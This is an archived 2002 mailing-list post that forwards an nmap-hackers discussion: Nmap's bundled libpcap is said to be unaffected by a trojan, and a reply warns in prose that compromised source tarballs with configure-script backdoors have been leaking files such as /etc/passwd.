From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from lrxms.net ([66.92.147.165] helo=zoose.lrxms.net) by speech.braille.uwo.ca with esmtp (Exim 3.35 #1 (Debian)) id 18C7XY-0004kM-00 for ; Wed, 13 Nov 2002 19:07:24 -0500 Received: from apollo.lrxms.net (apollo.lan [192.168.1.10]) by zoose.lrxms.net (Postfix) with ESMTP id A65E1A8 for ; Thu, 14 Nov 2002 00:07:20 +0000 (UCT) Received: by apollo.lrxms.net (Postfix, from userid 1000) id 1921237B79; Thu, 14 Nov 2002 00:07:20 +0000 (UCT) Date: Thu, 14 Nov 2002 00:07:20 +0000 To: speakup@braille.uwo.ca Subject: [pehrens@ligo.caltech.edu: Re: Nmap *NOT* affected by libpcap trojan] Message-ID: <20021114000720.GC6936@lrxms.net> Mail-Followup-To: speakup@braille.uwo.ca Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i From: showell@lrxms.net (Scott Howell) Sender: speakup-admin@braille.uwo.ca Errors-To: speakup-admin@braille.uwo.ca X-BeenThere: speakup@braille.uwo.ca X-Mailman-Version: 2.0.11 Precedence: bulk Reply-To: speakup@braille.uwo.ca List-Help: List-Post: List-Subscribe: , List-Id: Speakup is a screen review system for Linux. List-Unsubscribe: , List-Archive: Folks, I am subscribed to the list about Nmap. This info might e very interesting to folks. I have not had a chance to verify all the info nor have I seen anything from Bug Track, but that could be more a problem with not geting mail from my ISP. In any case, if anyone does know more, please share. tnx ----- Forwarded message from Philip Ehrens ----- Mailing-List: contact nmap-hackers-help@insecure.org; run by ezmlm From: Philip Ehrens To: Fyodor Cc: nmap-hackers@insecure.org Subject: Re: Nmap *NOT* affected by libpcap trojan Mail-Followup-To: Philip Ehrens , Fyodor , nmap-hackers@insecure.org I would like to point out that the type of trojan described below is becoming increasingly common. ftp.sendmail.org was compromised recently and a similar trojan was placed in the sendmail source tarball. I know of at least 12 common packages that have had their source tarballs compromised within the last 3 months on servers that were considered secure. The folks doign this have gone as far as to hijack DNS and root machines on specific subnets in order to place this type of trojan. These trojans are activated during te build process of the source tarball in most cases, usually the configure script contains some variation of code that establishes a connection to a remote machine. I believe that the folks doing this are actually trying to catch certain specific machines or subnets, and are not doing this to set up DDOS or just to own large numbers of boxes. When I activated one of these trojans while building a package all that happened was that my /etc/passwd file was shipped off. The machine listening on the other end never did anything except stay connected for a while. I expect to see more and more of this at an accellerating rate from now on... if you are letting root make remote connections you are asking for trouble! Sorry for using your list for this Fyodor, I won't do it again. Phil Fyodor wrote: > I just wanted to send out a quick note that the version of libpcap > shipped with Nmap does NOT contain the trojan described at: > > http://hlug.fscker.com/ > http://slashdot.org/article.pl?sid=02/11/13/1255243&mode=nested&tid=172&threshold=3 > > Cheers, > -F -------------------------------------------------- For help using this (nmap-hackers) mailing list, send a blank email to nmap-hackers-help@insecure.org . List run by ezmlm-idx (www.ezmlm.org). ----- End forwarded message -----